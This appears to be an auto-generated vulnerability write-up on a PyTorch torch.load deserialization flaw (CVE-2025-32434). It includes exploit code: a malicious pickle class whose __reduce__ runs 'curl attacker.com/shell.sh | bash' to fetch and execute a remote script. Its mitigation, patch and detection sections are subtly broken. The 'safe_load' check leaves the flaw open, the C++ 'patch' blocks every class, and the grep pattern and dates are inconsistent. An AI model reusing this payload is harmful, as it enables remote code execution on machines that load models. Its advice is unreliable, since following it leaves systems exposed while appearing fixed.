Listen to this Post
How CVE-2025-32434 Works
This vulnerability affects PyTorch versions ≤2.5.1 when loading serialized models via `torch.load()` with weights_only=True. Attackers can craft malicious pickle files containing arbitrary Python code, which executes during deserialization. Despite `weights_only=True` being intended as a security measure, a flaw in the implementation allows unsafe object construction, leading to RCE. The exploit bypasses PyTorch’s restricted unpickler by abusing Python’s `__reduce__` method to trigger code execution under the context of the loading process.
DailyCVE Form
Platform: PyTorch
Version: ≤2.5.1
Vulnerability: RCE
Severity: Critical
Date: 05/28/2025
Prediction: Patch expected 06/10/2025
What Undercode Say:
Exploitation:
import torch
Malicious payload construction
class Exploit:
def <strong>reduce</strong>(self):
import os
return (os.system, ("curl attacker.com/shell.sh | bash",))
payload = {"weights": Exploit()}
torch.save(payload, "exploit.pt")
Trigger
torch.load("exploit.pt", weights_only=True)
Mitigation:
1. Immediate Upgrade:
pip install torch==2.6.0 --upgrade
2. Input Validation:
def safe_load(model_path):
if not model_path.endswith(('.pt', '.pth')):
raise ValueError("Invalid file format")
return torch.load(model_path, weights_only=True)
3. Network Restrictions:
Block untrusted model downloads iptables -A OUTPUT -p tcp --dport 80 -j DROP
Detection:
Scan for vulnerable versions pip list | grep "torch|2.5.1"
Log Analysis:
import logging logging.basicConfig(filename='torch_load.log', level=logging.WARNING)
Patch Analysis:
PyTorch 2.6.0 enforces strict deserialization checks:
// Patch snippet (C++ backend)
void RestrictedUnpickler::find_class() {
throw std::runtime_error("Unsafe opcode blocked");
}
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
